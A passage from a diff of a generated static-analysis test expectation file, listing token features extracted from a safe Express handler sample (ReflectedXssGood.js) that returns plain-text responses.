... ;\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:30:2 | exceptional return of app.get ... ;\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:1:30:2 | exceptional return of app.get ... ;\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:5:22:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:5:22:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:5:22:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:9:22:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:9:22:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:9:22:19 | '/user/:id' | calleeImports | express | @@ -21079,6 +140633,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:9:22:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:9:22:19 | '/user/:id' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:9:22:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:22:21 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:22:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:22:21 | this | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:22:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:22:21 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | exceptional return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | functio ... ;\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | functio ... ;\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | functio ... ;\\n} | calleeImports | express | @@ -21086,6 +140655,96 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | functio ... ;\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | functio ... ;\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | functio ... ;\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:22:30:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:31:22:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:22:36:22:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:7:23:35 | !isVali ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:7:23:35 | !isVali ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:7:23:35 | !isVali ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:7:23:35 | !isVali ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:7:23:35 | !isVali ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:20 | isValidUserId | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:20 | isValidUserId | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:20 | isValidUserId | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:20 | isValidUserId | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:20 | isValidUserId | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | exceptional return of isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | exceptional return of isValid ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | exceptional return of isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | exceptional return of isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | exceptional return of isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | isValid ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:8:23:35 | isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:24 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:24 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:24 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:31 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:31 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:31 | req.params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:31 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:22:23:31 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:26:23:31 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:26:23:31 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:26:23:31 | params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:26:23:31 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:26:23:31 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:33:23:34 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:33:23:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:33:23:34 | id | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:33:23:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:23:33:23:34 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:7 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:7 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:7 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:11 | res.set | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:11 | res.set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:11 | res.set | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:11 | res.set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:11 | res.set | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | exceptional return of res.set ... plain') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | exceptional return of res.set ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | exceptional return of res.set ... plain') | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | exceptional return of res.set ... plain') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | exceptional return of res.set ... plain') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | res.set ... plain') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | res.set ... plain') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | res.set ... plain') | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | res.set ... plain') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:5:25:41 | res.set ... plain') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:9:25:11 | set | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:9:25:11 | set | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:9:25:11 | set | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:9:25:11 | set | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:9:25:11 | set | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:13:25:26 | 'Content-Type' | CalleeFlexibleAccessPath | res.set | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:13:25:26 | 'Content-Type' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:13:25:26 | 'Content-Type' | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21102,6 +140761,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:29:25:40 | 'text/plain' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:29:25:40 | 'text/plain' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:25:29:25:40 | 'text/plain' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:7 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:7 | res | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:7 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:12 | res.send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:12 | res.send | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:12 | res.send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | exceptional return of res.sen ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | res.sen ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | res.sen ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:5:26:46 | res.sen ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:9:26:12 | send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:9:26:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:9:26:12 | send | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:9:26:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:9:26:12 | send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:29 | "Unknown user: " | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:29 | "Unknown user: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:29 | "Unknown user: " | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:29 | "Unknown user: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:29 | "Unknown user: " | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:29 | "Unknown user: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:45 | "Unknow ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:45 | "Unknow ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:45 | "Unknow ... rams.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21110,6 +140800,92 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:45 | "Unknow ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:45 | "Unknow ... rams.id | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:14:26:45 | "Unknow ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:35 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:35 | req | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:35 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:42 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:42 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:42 | req.params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:42 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:42 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:45 | req.params.id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:45 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:45 | req.params.id | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:45 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:45 | req.params.id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:33:26:45 | req.params.id | stringConcatenatedWith | 'Unknown user: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:37:26:42 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:37:26:42 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:37:26:42 | params | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:37:26:42 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:37:26:42 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:44:26:45 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:44:26:45 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:44:26:45 | id | enclosingFunctionBody | req res isValidUserId req params id res set Content-Type text/plain res send Unknown user: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:44:26:45 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:26:44:26:45 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:32:0 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:32:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:32:0 | this | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:32:0 | this | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:32:0 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | 'arguments' object of function textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | 'arguments' object of function textContentType | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | 'arguments' object of function textContentType | enclosingFunctionBody | result text/plain | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | 'arguments' object of function textContentType | enclosingFunctionName | textContentType | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | 'arguments' object of function textContentType | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:32:1:34:1 | exceptional return of function textContentType | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| 